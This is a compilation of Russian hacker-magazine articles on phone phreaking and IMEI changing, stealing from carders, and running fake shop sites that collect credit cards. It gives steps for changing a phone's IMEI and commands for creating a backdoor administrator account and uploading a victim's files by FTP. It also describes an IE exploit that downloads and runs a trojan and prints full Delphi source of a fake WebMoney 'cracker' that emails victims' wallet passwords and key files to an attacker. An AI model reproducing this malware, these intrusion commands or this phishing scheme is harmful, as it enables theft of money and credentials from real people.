Сегодня, да, в общем-то, как и всегда, все хотят халявы. Это слово прижилось в сознании русского народа. Каждый хочет бесплатного проезда в метро, бесплатной автостоянки возле магазина рядом с домом, бесплатного туалета, даже бесплатных пакетов в супермаркете. Сотовая связь не исключение. Только сейчас на рынке мобильной связи эта проблема теряет актуальность, а в начале девяностых она была весьма насущной. В наши дни никто не будет тратить на сотовую связь 20-30 баксов в день - легче купить безлимитный тариф, а лет десять назад такой тариф в год обходился в стоимость нового автомобиля бизнес-класса.

А народ хотел дешевле…

Народ хотел дешевле, а операторы не снижали цены в силу многих причин - за что и расплачивались в буквальном смысле. Именно в то время начали появляться так называемые фрикеры - телефонные пираты. Многие думают, что если сосед дядя Вася с седьмого этажа поменял прошивку на своем сотовом телефоне, то он автоматически стал фрикером. Нет. Настоящие фрикеры были специалистами своего дела – в то время их было очень мало, а сейчас практически нет. Это выпускники МИФИ, МВТУ имени Баумана и других сильных вузов, где программирование, высшая математика и радиоэлектроника стоят не на последних местах в списке изучаемых дисциплин. Они делали связь бесплатной, чем привлекали внимание общественности и соответствующих силовых структур. Именно тогда было создано небезызвестное Управление «Р», занимающееся преступлениями в сфере высоких технологий. Сейчас такие фрикеры не востребованы, потому что их работа не окупается, а в начале девяностых они легко зарабатывали в день сумму с четырьмя нулями и далеко не российских рублей. Именно те девяностые ознаменовались спадом российской экономики, тогда деньги валялись на земле – их нужно было только поднять, и фрикеры поднимали.

Отпустите меня в Гималаи

Все начиналось с пресловутых телефонов «Алтай», с которых звонили родственникам в Америку. Причем бесплатно и много, за счет людей, к которым нелегально подключались. Потом все перешло на сотовые. С ними, однако, все сложнее – ведь в мобильном телефоне есть SIM-карта, которую определяет базовая станция и регистрирует в сети по ее номеру – а не по номеру сотового. Безусловно, я имею в виду стандарт GSM. Этот номер и вся другая важная информация (PIN, PUK и пр.) закодирована на SIM-карте 128-битовым ключом. Самая большая проблема была в том, чтобы подобрать этот ужасно-много-битовый ключ. Сделать это в домашних условиях можно только банальным перебором. И именно этим занимались настоящие фрикеры. Но об этом чуть позже, а пока я расскажу тебе необходимый минимум теории.

Вообще, вся зона охвата территории оператором делится на относительно маленькие соты (их диаметр - в среднем 5 километров). В городе, как правило, это расстояние – метров 600, за городом – около четырех километров. Как только абонент переходит с включенным телефоном из одной соты в другую, его регистрирует базовая станция той соты, на которой он в данный момент находится. Расстояние до ближайшей базовой станции определяется элементарно. Во многих аппаратах эта уникальная опция скрыта, ее просто нужно найти. Мобильный телефон определяется по-другому: у каждого аппарата есть пятнадцатизначный серийный номер – IMEI. Первые четырнадцать цифр этого номера фиксировано устанавливаются при прошивке, пятнадцатая генерируется псевдослучайно. У всех телефонов IMEI изначально разный; к определению и регистрации в сети он никакого отношения не имеет. Он нужен для того, чтобы узнать владельца аппарата, если это необходимо. Но это намного более трудоемкое и неблагодарное занятие, чем определение местоположения активной в данный момент SIM-карты. Серийный номер мобильного телефона говорит о многом. По нему можно узнать номер партии, к которой принадлежит данный телефон. А по номеру партии - «серый» этот сотовый или нет.

SIMEdit и RS-232

Много ходило и ходит легенд о перепрошивке SIM-карты. Некоторые из этих легенд никакого отношения к самой перепрошивке не имеют. Перепрошивка, или клонирование, SIM-карты, на самом деле нетрудоемкий процесс, но он требует больших материальных затрат, прямых рук, светлой головы и большого количества свободного времени. Очень часто я слышал рассказы о том, что люди создавали образ симки, имея в руках только комплекты PIN и PUK-кодов от этой самой SIM-карты, а потом с помощью кабеля RS-232 запросто перепрошивали ее в самом телефоне. Это бред. На данный момент я не знаю человека, который смог бы перепрошить SIM-карту удаленно, и, наверное, не узнаю никогда.

Также упоминалась программа SIMEdit, которая может «абсолютно» все, на поверку оказавшаяся обычным редактором телефонной книги, деревянным и не бесплатным. Узнать тот самый 128-битовый ключ SIM-карты можно только с помощью мощнейшего криптоанализатора (стоимость которого заоблачна для среднестатистического пользователя), и не меньше чем за 10 часов. Есть еще одно «но»: за эти десять, а может, и больше часов идет сильнейшая нагрузка на SIM, и некоторые экземпляры карточек этого не выдерживают и сгорают.

Жаркая весна сорок пятого

Иными словами, при себе, минимум на полдня, нужно иметь SIM-карту товарища, которая обязана выжить, потому что ей еще предстоит работать. Но фрикеров такие нюансы не останавливали, а даже наоборот – вдохновляли. Они находили симки, делали их образы и выкидывали сотни сгоревших. Телефонных хакеров не останавливало даже то, что с перепоршитой карты можно только делать звонки, а не принимать их. В то время минута, по теперешним меркам, стоила очень дорого, и этот бизнес того стоил.

В мае 2002 года в российских СМИ появилось заявление о том, что специалисты из компании IBM смогли взломать код SIM-карты с помощью только общедоступных электронных приборов за несколько минут. Т.е. любой дядя Вася, о котором я упоминал ранее, может с помощью одного паяльника за пять минут взламывать симки. Естественно, такой расклад не понравился никому. Сразу же после этого феноменального открытия (не факт, кстати, что оно было открытием – у нас тоже не дураки сидели), по технологии, предложенной IBM, к кодовой матрице была добавлена вспомогательная, беспорядочно сгенерированная, которая усиливала защиту SIM-карты на порядок и прикрывала обнаруженную дырку. К этому времени фрикерство постепенно изжило себя.

С телефонами же стандарта DAMPS, AMPS и пр. дела обстояли намного проще. Информация о сим-карте хранится у них в энергонезависимой памяти телефона – eeprom’е. Чтобы сделать «двойник» такого телефона, нужно всего лишь изменить IMEI, который, кстати, никак не зашифрован.

No pain, no game

Хакеров ловили и сажали. Их было немного, и поймать их было нетрудно. Им подсылали подставных лиц под видом покупателей, а потом брали с поличным. Намного больше было людей, которые пользовались левыми SIM-картами, и посадить их было сложнее. Им нечего было предъявить. А Управлению «Р» надо было повышать раскрываемость телефонных преступлений, потому что заявлений приходила уйма. Операторы сами пытались бороться с хакерами. Множество людей обращались в центральные офисы с вопросом: «А откуда у меня в распечатках счетов такие огромные суммы и непонятные телефонные номера?» Абоненту вдвойне компенсировали украденную сумму, просили вычеркнуть свои телефоны и начинали работать с оставшимися. По этим номерам пытались выйти на «двойников», но результатов, естественно, эти оперативно-розыскные мероприятия не давали. Так было в самом начале, сейчас же такие проблемы могут возникнуть из-за неточности систем биллинга. Но до сих пор для меня остается загадкой, почему операторам это всегда идет в плюс.

Пионер всегда готов, как Гагарин и Титов

Но шло время, поднимать деньги с пола стало намного сложнее, особенно сидя. Нужно было искать более законные методы. Законные в том смысле, чтобы в Уголовном кодексе не было по этому поводу законов. На рынок связи пришла новая волна фрикеров, которых фрикерами-то не назовешь. Их стало очень много. Они просто умели тупо производить разлочку сотовых телефонов и последующую их русификацию, нажимая клавиши на клавиатуре в определенном порядке. У них не было никакого багажа знаний, о том, как это делать, им рассказали умные люди, которые, в большинстве своем, шлифовали к тому времени нары.

Чуть раньше разлочить телефон стоило дорого: в розницу порядка 40-50 американских президентов. Аппараты стоили в России намного дороже, чем на Западе. Их оттуда и везли. Здесь телефоны перепрошивали под наши сети. Именно в то время появилось понятие «серый» телефон. Сейчас «серых» практически нет, правда, иногда в Москве можно увидеть крупные партии. Но не тогдашнего масштаба, когда только в офисах операторов продавали сертифицированное оборудование. Тут пришло и много зеленых фрикеров, и цены стали обвально падать: буквально до двух-трех долларов за штуку. Каждый хотел урвать свой кусок, и нерезиновый пирог пришлось поделить на огромное количество человек. Тогда для тех, кто был не в курсе (а их было подавляющее большинство), разлочка телефона стояла на одном уровне сложности с перепрошивкой SIM-карты. Они были практически правы, но этот уровень для них был самым последним. Когда гражданин узнавал, что «тот вон парень в рыжей футболке перепрошивает телефоны», он сразу проникался глубоким уважением к этому человеку.

Серийные номера

Используя информацию о мобильниках, которая на данный момент лежит в интернете, можно практически с любым телефоном вытворять что угодно. Можно заблокировать сотовый на сеть, на отдельную SIM-карту, снять с телефона код блокировки, изменить IMEI и много чего другого. Кстати, про IMEI. Однажды с моей знакомой приключилась неприятная история. В институте у нее украли телефон, и она обратилась в офис оператора с вопросом о возможности возврата ей ее сотового. Оператор сказал, что это не вопрос. Он объяснил, что нужно только подать заявление в милицию, и он (оператор) сам по серийному номеру телефона найдет аппарат, ведь каждый номер уникален. Они ей совершенно серьезно сказали, что IMEI изменить невозможно, когда я буквально за несколько часов до этого менял первые одиннадцать цифр серийного номера мобильного на номер своего сотового телефона в международном формате. Именно поэтому в самом начале я сказал, что IMEI разный у всех телефонов только изначально, на этапе их выпуска с конвейера.

Потом можно найти телефон с таким же серийным номером, как у твоего, причем не один. Возникает предположение, что операторы сотовой связи просто делают вид, что они не в курсе.

Flash, eeprom и другие страшные слова

Как я уже говорил, разлочить телефон просто, так же просто, как и достать для этого программное обеспечение. Чтобы заставить сотовый работать в необходимом качестве, нужно изменить его память, т.е. перепрошить ее. Я говорю про flash-память телефона. Только не про тот flash, который ты засовываешь в цифровой фотоаппарат или mp3-плеер, и не про тот, который ты наблюдаешь в интернете. Телефонный flash – это практически то же, что и операционная система компьютера. Это все телефонное меню, игры, калькулятор, диктофон и пр. Эта память - как матрешка, которая продается на Старом Арбате. Самая большая – flash, в нее входит eeprom, который значительно меньше. В eeprom’е записана вся информация по кодам блокировки телефона, настройкам аппарата и другим нужным штуковинам. И самая последняя – память, содержащая IMEI и дату выпуска телефона – она, в свою очередь, является частью eeprom’а. Для русификации телефона производятся изменения во всем flash’е, для разлочки телефона или смены серийного номера – в eeprom’е. Flash в среднем весит 14 мегабайт, eeprom – 53 килобайта, поэтому для разлочки телефона легче из аппарата выкачивать именно eeprom, и с ним уже работать дальше. Единственный нюанс – проверка контрольной суммы. Если во flash’е стереть что-то нужное или добавить лишнее, телефон в лучшем случае откажется работать.

Универсальная программа

Нужно было найти софт, который бы выкачивал flash из телефона, а потом закачивал его обратно. Раньше эти программы были страшным секретом, многие даже не знали, как они называются, некоторые делали их самостоятельно, но от этого суть не менялась. Сейчас я расскажу про программу для работы с телефонами марки Siemens. Ребятам-разработчикам этой программы поставили памятник при жизни. Эта штуковина называется Unisiemens, достать ее можно в любом месте Интернета, и она проста в применении. С ее помощью можно скачать и flash, и eeprom, и даже кусок flash’а с определенного адреса, а потом залить это все обратно.

Есть два способа разлочить телефон. Самый простой способ: скачать из такого же, но не незалоченного, телефона eeprom и залить его на залоченный. Самый сложный способ: слить eeprom из залоченного телефона – он будет представлять собой обычный бинарник, и разбираться с ним в шестнадцатеричном редакторе. Я в свое время выбрал HexEditor – он до сих пор лежит у меня на почетном месте. Выбор за тобой. Практически так же меняется IMEI телефона, правда для этого существуют немного другие программы, но в интернете их тоже достать несложно, а пользоваться еще легче.

У меня самый первый разлоченный телефон был мой собственный. Я его заблокировал, а потом перепрошил. Я очень за него боялся – он стоил больше трехсот баксов, а другой я покупать не хотел. Но все прошло нормально. И после этого я уже не боялся ничего :).

И снится нам не рокот космодрома…

Но фрикеры занимались не только разлочкой аппаратов и дублированием SIM-карт. В то время существовали возможности прослушивания разговоров по мобильным телефонам. Оборудование стоило порядка пятидесяти-ста тысяч долларов. Главное, чтобы были заказы, правда, за абонентами нужно было бегать в пределах одной соты. Шифровка тогдашнего GSM’а, которой, к слову сказать, почти и не было, на несколько порядков была слабее шифровки GSM’а сегодняшнего. Раньше операторы не задумывались о возможности таких случаев, пока не посадили пару «шпионов». Теперь же сотовая связь практически безопасна: даже операторы сами не могут слушать абонентов. Но бывает, что операторы снимают шифрование с сети. Наверное, все помнят недавний теракт в Тушино во время праздника Крылья. В тот день на территории аэродрома, где проходил праздник, до вечера были отключены все базовые станции. Иными словами, образовался информационный колпак, блокирующий услуги всех московских операторов сотовой связи. Буквально в следующие дни по всей Москве по приказу правительства была отключена шифровка разговоров на всех сотовых телефонах стандарта GSM. Тогда абоненты на три дня смогли почувствовать себя в девяносто третьем.

А сейчас…

Сейчас, в силу причин, о которых я рассказал выше, телефонный фрик стал историей. Сегодня совсем другая, на несколько порядков сильнее, защита сотовых сетей и SIM-карт, другое время, другие понятия. Те фрикеры знали, что только на первом этапе появления сотовой связи в России можно зарабатывать большие деньги. Они знали, что такие времена быстро пройдут. И те, кто был хитрее, отхватили больше всех и ни о чем потом не жалели. По крайней мере, на хлеб с икрой им хватало вполне.

Теперь прошли времена телефонов размером с двухкассетный видеомагнитофон, а цена минуты разговора с пяти американских долларов скатилась до SMS за один американский цент. Уже давно никто не перепрошивает SIM-карты, зато на Митино непонятно откуда берутся номера карточек предоплаты, написанные в столбиках на листах бумаги. Но это уже информационный фрик, который прочно занимает место телефонного.

Сегодня совсем другая, на несколько порядков сильнее, защита сотовых сетей и SIM-карт, другое время, другие понятия.

Я думаю, тебе не терпится что-нибудь сделать со своим телефоном, а разбираться с flash’ом вручную неохота. По глазам вижу и понимаю. Наверное, тебе уже хочется поменять несколько чисел серийного номера телефона на год своего рождения. Сегодня я предоставлю тебе эту уникальную возможность. Раз уж мы в статье упоминали про Siemens, то с ним и будем работать. Приготовься стать настоящим фрикером.

Приготовился? Поехали. Для того чтобы изменить IMEI своего телефона, нужно:
  1. Включить компьютер.
  2. Иметь в руках сотовый телефон и кабель RS-232, подключенный к компьютеру.
  3. Установить программу Siemens Unlock.
  4. Запустить программу и выбрать модель своего сотового.
  5. Зайти Сервис > Разблокировать/Сменить IMEI.
  6. Ввести желаемый IMEI и нажать кнопку сменить.
Как ты уже заметил, функции программы на этом не ограничиваются. Надеюсь, намек понят. И напоследок: если тебе это все очень интересно, зайди на ftp://vts.vlad.ru/pub/. Ты обязательно найдешь там что-нибудь для своего телефона.

Как обчищают богачей

Все люди зарабатывают себе на жизнь. Причем различными способами. Некоторые выбирают обогащение в виртуале. При этом сам заработок не всегда бывает честным. Человек рискует, проводит важные банковские операции, продает кредитки, покупает различные вещи... и в какой-то момент все теряет. Из-за собственной невнимательности его полностью обчищает хакер Вася из Мухосранска. Почему так происходит, и как взломщику удается напасть, на, казалось бы, защищенных кардеров? Давай попробуем разобраться.

Укротим систему!

Способов украсть ценную информацию и сбережения кардера очень много. Но стоит оговориться, что в этом деле главное не количество, а качество, то есть успешное применение этих способов.

Итак, самое время рассказать, как же хакер может украсть данные у жертвы. Во-первых, это взлом компьютера богатого буратино ;). Здесь - как повезет, ничего нельзя сказать наверняка. Если человек - раззява и не читает багтраки, то шансы хакера резко возрастают. В противном случае, да еще и с установленным на машине фаерволом, этот способ непригоден.

Как же ломают рабочие станции пользователей? Тут также существуют свои способы. Остановимся на бажной WinNT. Ты всегда думал, что если винда имеет префикс NT, то у нее стопроцентная защита? Я тебя разочарую. В таких платформах были найдены очень опасные баги.

RPC-эпидемия

Если ты не знаешь об RPC-уязвимости, то у тебя позднее зажигание. Об этой ошибке трубили все порталы по безопасности, а также было выпущено множество эксплоитов, в том числе и для Windows (рай для скрипткидисов). Как же хакер может поиметь бабла с наивного буржуя, который, наверное, и не знает о существовании патча от RPC-баги? Очень просто. Достаточно завладеть доступом к его системе и набрать ряд консольных команд. После этого все важные документы будут находиться в лапах злоумышленника.

Я не буду тебя учить эксплуатировать уязвимость. Об этом писали различные хакерские порталы, а также Хакер #9. Я лишь заострю твое внимание на командах, которые могут пригодиться взломщику, захватившему права на системе жертвы.

Чтобы не использовать шумный эксплоит (который, кстати, может разрушить RPC-вызовы и привести систему к краху) каждый раз, можно создать аккаунт администратора. Его, как известно, пустят на такие ресурсы, как C$, D$ и прочие. Это сделать очень легко. Достаточно лишь набрать следующие строки:

Code:
net user admin nimda /add

(добавляем нового пользователя admin с паролем nimda, параметры можно подставить свои).

Code:
net localgroup Administrators admin /add

(присвоим пользователю группу Administratots).

В случае, когда локализация платформы не английская, необходимо подставить название группы на родном языке. Для этого хакер набирает "net user" и узнает истинное название группы.

Если все было сделано верно (команда net обязательно сообщит хакеру о результате операции), взломщик может зайти на машину с локального компа. В этом ему помогает команда "net use z: \\IP-ADDRESS\C$". Но он этого никогда не сделает по одной простой причине - на машине ведутся логии, и его IP-адрес обязательно будет записан. Но выход есть - хакер заходит не с себя, а со своего любимого скарженного шелла.

Code:
smbclient //IP-ADDRESS/$C -U admin

Эта команда актуальна для Linux. После запроса пароля хакер попадает в системный ресурс $C (для того чтобы выполнить подобные действия, взломщик предварительно устанавливает на машину пакет samba).

Но иногда простого доступа к директориям недостаточно. Например, в том случае, когда необходимо протроянить юзера или поставить на машину кейлоггер (а также просмотреть лист процессов, убить один из них и т.д. и т.п.). В этом случае взломщик либо вешает дополнительный бэкдор, либо использует эксплоит каждый раз.

Кто ищет, тот всегда найдет

В поиске информации нет ничего хитрого. Если хакер нетерпелив (а таких мало), он просто шарит по папкам и выкачивает файлы с подозрительными именами (типа 1111.doc или paroli.doc). Текстовики можно прочитать на месте командой "type file". Многие руководства по взлому винды пишут об обязательном аккаунте на каком-либо TFTP-сервере. Однако можно выполнить операцию через обычную команду ftp. Предварительно составляется сценарий, который состоит из простых операций, передаваемых ftp. Он может выглядеть, например, следующим образом:

пример FTP-сценария

Code:
user vasya vasya123

type binary

put document.doc /xakep/document.doc

quit

После составления (команды сценария последовательно записываются в файл с помощью echo и стандартного перенаправления ввода) скрипта, он передается консольной утилите с помощью параметра -s:имя_файла. Следует учитывать, что аутентификация была произведена в одной команде, поэтому добавляем к командной строке опцию -n.

Следует отметить, что в винде нет команды поиска, которая присутствует в Linux. Но это совсем не означает, что найти файл в консоли невозможно. Предметом охоты для хакера являются кошельки WebMoney, которые имеют расширение kwm и pwm. Их можно найти следующей командой:

Code:
dir /S c:\ | find *.?wm

При этом будет выполняться рекурсивный вывод всех каталогов с диска c:\ и последующая фильтрация файлов с помощью команды find.

WebMoney - радость хакера

После того, как кошельки WebMoney будут скачаны, необходимо узнать идентификатор счета (это выполнит клиент), а также пароль на вход. Пароль на WebMoney не может быть изменен и задается всего один раз (аналог PIN-кода в кредитной карте), поэтому возможно, юзер записал его в файл, чтобы не забыть. При удачном стечении обстоятельств, хакер вытягивает этот файл и кошельки и полностью завладевает счетом жертвы. Внимание! Это очень опасно, поскольку система перевода денег имеет историю всех проведенных операций. Скажу по опыту, что у взломщиков есть свои люди, которые отмывают деньги на счете, беря за услуги некоторый процент от суммы.

Существуют и другие способы добычи пароля. Например, такой: хакер сумел узнать несколько паролей, которые жертва использует в Сети. Он пробует перебрать их все и, возможно, один из них будет верным. Когда способов не остается, можно найти подходящий кейлоггер, шлющий клавиатурный дамп на вражеский e-mail адрес. После того как он будет запущен на компьютере, остается только ждать, пока пользователь не воспользуется клиентом WebMoney. Существует способ для ускорения этого процесса - отправка жертве письма, в котором будет говориться о том, что кошелек был пополнен на энную сумму. Тогда-то он обязательно запустит клиент.

Вообще, есть еще один метод завладения WM-кошельком. Он практикуется среди богатых, но ламернутых личностей, которые недавно, но успешно постигают кардерские махинации. Создается программа, типа "крякера интернета", но она не крякает интернет, а уводит кошельки WebMoney. Реализовать ее - пара пустяков, проблема в другом - впарить прогу жертве. Это может сделать хороший хакер, имеющий богатый опыт в социальной инженерии.

Исходный код этой небольшой программы ты найдешь во врезке. Полный исходник проекта есть на диске.

Помимо самой службы WebMoney, есть сервис Merchant (http://merchant.webmoney.ru), который нужен для проведения онлайн-операций по переводу денег с одного WM-кошелька на другой. Обычно сервис применяется в различных проектах, например, интернет-магазинах. Если хакер взламывает подобный ресурс, он просто заменяет в исходном коде скрипта ссылку и параметры на свой кошелек WebMoney. При этом клиент будет пересылать деньги на счет злоумышленника. Бесспорно, это скоро будет замечено, но взломщик успеет обогатиться.

Бреши в ослике

RPC-уязвимость далеко не единственная бага в форточках. Рассмотрим еще один пример - ошибка в обработке тега <OBJECT>, позволяющая выполнять произвольный код на машине клиента. Реализовав такую уязвимость, хакеру ничего не стоит залить троян на жертву, да еще и записать в лог его IP-адрес, который впоследствии будет проверен на заражение бэкдором.

Для написания эксплоита достаточно создать следующий html-документ:

Code:
<object data="/object.html">Привет всем ;)</object>

А в object.html положить скрипт, например на Visual Basic. В нем будет производиться выкачивание трояна по указанному адресу и его последующий запуск. При желании можно пофантазировать с записью бэкдора в реестр (если, конечно, в нем уже не реализована подобная функция), но это исключительно проблемы взломщика.

Для записи IP-адреса в лог-файл надо написать простенький perl-скрипт. Например, такой:

Perl-скрипт для записи адреса в лог

Code:
#!/usr/bin/perl

print "Content-type: text/html\n\n";

$ip=$ENV{REMOTE_ADDR};

open(LOG,">>ipz.log");

print LOG "$ip\n";

close(LOG);

На этот сценарий делается редирект с главной страницы, либо вызывается SSI-вкладка, к примеру, следующая:

Code:
<!--#exec cgi="/path/to/iplog.cgi"-->.

Следует помнить, что для выполнения SSI-вставок, файлу необходимо дать расширение shtml. Что касается файлов для записи (ipz.log), то они должны иметь атрибут 666.

Смысл этого метода заключается в засылке вредоносных программ на компьютер жертвы, используя бреши в операционной системе. Регулярно обновляемый список уязвимостей ты можешь найти на любом портале по безопасности.

А как же Linux?

Что касается Linux, то все методы этой, казалось бы, неприступной системы были изложены в статье этого номера "Найди и поимей!". В этой системе можно найти, пожалуй, только кредитные карты и файлы, хранящие в себе пароли, а также аккаунты на какие-либо ресурсы.

Эффективным способом хищения информации является сниффинг данных. Сниффер - программа, которая перехватывает весь трафик на определенных интерфейсах и отбирает из него инфу, которая указана в конфе снифака. Программ, которые перехватывают весь трафик и записывают его в логи (при этом фильтрация остается проблемой хакера), довольно мало. В основном, снифферы удобно настраиваются и незаметно запускаются на сервере.

Принцип всех снифферов основан, как я уже сказал, на перехвате данных определенного сетевого интерфейса. При этом устанавливается режим promisc, при котором все данные проходят через сетевую карту, несмотря на то, что предназначены они были для других машин. Ты, наверное, догадываешься, что успешно заюзать сниффер можно лишь на компьютерах, которые выполняют функцию маршрутизаторов. Если это так, то хакер будет перехватывать весь трафик в локальной сети.

В последнее время снифферы пишут очень грамотные люди. Их не способны засечь никакие утилиты, типа ps, ifconfig, IDS и прочие.

Еще одним интересным способом взлома является брутфорсинг (перебор) паролей на определенный сервис. Я слышал о таких приватных проектах, как переборщик https-аккаунтов. Таким образом, взломать учетную запись бизнесмена на каком-либо секурном сервисе вполне реально.

Я уже не говорю о переборе паролей на небезопасных сервисах, которые поддаются сниффингу. Таких брутфорсеров в интернете навалом, и большинство из них поддерживают многопоточный перебор. Конечно, прошли времена, когда в качестве аккаунтов применялись пары root/root или admin/admin, но словарные пароли встречаются очень часто. Так что подобрать пароль становится вполне реальным.

Таким образом, подвожу итог. Воровство аккаунтов - наболевшая тема. Воруют все кому не лень, и то, что плохо лежит. Поэтому, если ты преуспевающий сетевой бизнесмен, рекомендую защитить свою систему необходимыми патчами, а также грамотно настроенным фаерволом. Только тогда ты будешь в абсолютной безопасности.

Кодинг

Настало время представить проект, реализующий «крякер» кошельков WebMoney. На самом деле, эта фейк-программа просто отсылает все ключи и пароль на мыло злоумышленника.

Для реализации задуманного потребуются следующие компоненты:

5 Label (текст, вкладка Standard), 5 Edit (вводимый текст, вкладка Standard), 3 Button (кнопка, вкладка Standard), Memo (Текстовое поле, вкладка Standard) и ProgressBar (вкладка Win32), а также компоненты NMSMTP(вкладка FastNet) и OpenDialog(вкладка Dialogs).

Назначаем caption кнопкам и текстовым полям.

Code:
Label1.Caption := 'WM (Webmoney Identificator)';

Label2.Caption := 'Кошелек (Пример: Z143365768493)';

Label3.Caption := 'Пароль WM';

Label4.Caption := 'Путь к файлу ключей';

Label5.Caption := 'Сумма для перевода';

затем кнопкам:

Code:
Button1.Caption := 'Обзор';

Button2.Caption := 'Генерировать';

Button3.Caption := 'Отмена';

Полю Memo ставим текст, тоже через переменные:

Code:
memo1.text := 'Примечание:'+#13#10+

'Размер файла ключей должен быть минимальным, т.к. программа изменяет его содержимое и закачивает на сервер.'+#13#10+

'Если размер будет более 1 мегабайта, то компания WebMoney заметит среди своих'+#13#10+

'ключей - твой, который имеет большой размер.';


События для нажатых кнопок:

// Обзор

Code:
procedure TForm1.Button1Click(Sender: TObject);

begin

// если диалог удачно запущен то

Code:
if opendialog1.Execute then

// записываем имя файла

Code:
Edit4.Text := opendialog1.FileName;

end;

// Генерировать

Code:
procedure TForm1.Button2Click(Sender: TObject);

begin

// ProgressBar1 - изменение положения ползунка прогресс-бара

Code:
ProgressBar1.Position:=0;

// Вложенные файлы

Code:
NMSMTP1.PostMessage.Attachments.Text := Edit4.text;

ProgressBar1.Position :=ProgressBar1.Position+10;

// Body отправляемого письма

Code:
NMSMTP1.PostMessage.Body.Text := 'WmCrack 9.1.2 PRO Message'+#13#10+

'Some lame use you programm...:)'+#13#10+

'WM ID: '+Edit1.text+#13#10+

'Z or E or R: '+Edit2.text+#13#10+

'Pass:): '+edit3.text+#13#10+

'File.kwm: '+Edit4.text+#13#10+

'Money: '+Edit5.text;

ProgressBar1.Position:=ProgressBar1.Position+10;

// Тема письма

Code:
NMSMTP1.PostMessage.Subject :='>>>WMCRACK*************';

ProgressBar1.Position:=ProgressBar1.Position+10;

// Имя программы, которая отправляла письмо

Code:
NMSMTP1.PostMessage.LocalProgram :='SomeShit';

ProgressBar1.Position:=ProgressBar1.Position+10;

// Reply-To адрес

Code:
NMSMTP1.PostMessage.ReplyTo :[email protected]';

ProgressBar1.Position:=ProgressBar1.Position+10;

// Почта отправителя

Code:
NMSMTP1.PostMessage.FromAddress :[email protected]';

ProgressBar1.Position:=ProgressBar1.Position+10;

// Имя отправителя

Code:
NMSMTP1.PostMessage.FromName :=':WMCrack:';

ProgressBar1.Position:=ProgressBar1.Position+10;

// E-mail хакера

Code:
NMSMTP1.PostMessage.ToAddress.text :[email protected]';

ProgressBar1.Position:=ProgressBar1.Position+10;

// SMTP сервер хакера

Code:
NMSMTP1.Host := 'i-have.cc';

ProgressBar1.Position:=ProgressBar1.Position+10;

// Отсылка письма

Code:
NMSMTP1.SendMail;

ProgressBar1.Position:=100;

// Сообщение об удачной отправке денег жертве

Code:
Showmessage('Обновите свой WM Keeper, сумма должна придти в течение 1-2 минут.');

end;

// Отмена

Code:
procedure TForm1.Button3Click(Sender: TObject);

begin

NMSMTP1.Abort;

// Прогресс-бар ставим на 0

Code:
ProgressBar1.Position :=0;

end;

Обзор снифферов

Как я уже говорил, в инете полно снифферов. На первый взгляд разобраться в них не так-то просто, поэтому публикую небольшой обзор программ-нюхачей.

Sniffit. Один из первых снифферов, который по-прежнему является очень популярным. Он сохраняет первые 400 байтов пакета по умолчанию, но хакер может настроить его так, чтобы он перехватывал пароль жертвы.

TCPdump. Знаменитый сниффер. Считается профессиональным административным средством.

ADMsniff. Известная, очень квалифицированная группа хакеров ADM написала отличный сниффер. Определенно советую посмотреть, т.к. все, что они делают, стоит внимания.

Linsniffer. Популярный сниффер, разработанный для платформ Linux.

Sunsniff. Этот сниффер выполнен под платформу SunOS. Возможно, один из самых известных снифферов, сделанный почти десять лет назад.

Поломали?

Если ты оказался в лапах хакера, то, возможно, у тебя бреши в операционке. Обязательно читай bugtraq и вовремя накладывай патчи на свою систему. Взять их можно на www.microsoft.com

Способов украсть ценную информацию и сбережения кардера очень много.

Я не буду тебя учить эксплуатировать уязвимость. Об этом писали различные хакерские порталы, а также Хакер #9. Я лишь заострю твое внимание на командах, которые могут пригодиться взломщику, захватившему права на системе жертвы.

В поиске информации нет ничего хитрого. Если хакер нетерпелив (а таких мало), он просто шарит по папкам и выкачивает файлы с подозрительными именами (типа 1111.doc или paroli.doc). Текстовики можно прочитать на месте командой "type file".

Если хакер взламывает подобный ресурс, он просто заменяет в исходном коде скрипта ссылку и параметры на свой кошелек WebMoney.

Следует помнить, что для выполнения SSI-вставок, файлу необходимо дать расширение shtml.

Эффективным способом хищения информации является сниффинг данных. Сниффер - программа, которая перехватывает весь трафик на определенных интерфейсах и отбирает из него инфу, которая указана в конфе сниффака.

Еще одним интересным способом взлома является брутфорсинг (перебор) паролей на определенный сервис. Я слышал о таких приватных проектах, как переборщик https-аккаунтов.


Личный псевдосайт кардера

Некоторые личности ничего не делают и... получают реальные доходы. Без начального капитала, с абсолютного нуля. И повторить их опыт может каждый, даже ты. Для этого нужно желание, удача и чуть-чуть терпения. Я расскажу тебе о прибыльном бизнесе, построенном на псевдосайтах.

Что такое псевдосайты

Псевдосайт - это не что иное, как умело сделанный ресурс, который имеет автоматизированную систему оплаты по кредитным картам. Но в отличие от проектов, которые исправно высылают товар после оплаты, псевдоресурс совершенно негуманно динамит покупателя, помещая данные о кредитке в отдельную базу. При серьезном подходе к делу, псевдосайт может приносить кардеру умопомрачительные доходы. Все потому, что интернет-магазины (либо порногаллереи) пользуются большой популярностью среди тупых, но богатых буржуев, для которых онлайновые покупки - норма жизни.

Что нам стоит сайт построить

Чтобы построить псевдосайт, необходимо найти для него программное обеспечение - движок. Он состоит из отдельных html-страниц (формы для оплаты) и скриптов, которые обрабатывают вводимую информацию. Авторы движков используют два способа для хранения полученных данных:
  1. Через базу данных (БД). Этот способ избавляет от многих проблем, с которыми может столкнуться пользователь движка, для успешной работы достаточно создать базу и пару таблиц. Затем скрипты сами будут обращаться к БД и запрашивать/сохранять данные.
  2. Посредством файлов. Все бесплатные движки распространяются именно с таким алгоритмом. Здесь тебе придется попотеть, изменяя дефолтовые значения путей в конфигах сценариев. Нельзя забывать и о правах доступа к файлам, в которые будет записываться информация (проставляются вручную).
На фриварных источниках валяется неплохой движок dcshop. Он организует универсальный интернет-магазин по продаже всякого хлама. Умеет авторизовывать после оплаты по кредитке и комплектуется скриптом для администрирования товаров.

Удобно, что dcshop работает как под UNIX, так и под NT платформы. В довесок к этому он снабжается подробным мануалом и кучей дефолтовых конфигов.

Для того чтобы магазин функционировал, от хостинга требуется:
  • доступ к FTP-серверу;
  • WWW-сервер с поддержкой cgi-сценариев;
  • желательна поддержка собственных .htaccess-файлов;
  • желателен доступ по SSH, что позволит без особых проблем установить и изменить настройки dcshop прямо с шелла.
Первые два пункта, которые необходимы, удовлетворяют практически все бесплатные хостинги, поэтому регистрируйся на буржуйском ресурсе (проще отмазаться потом) и приступай к установке онлайн-магазина.

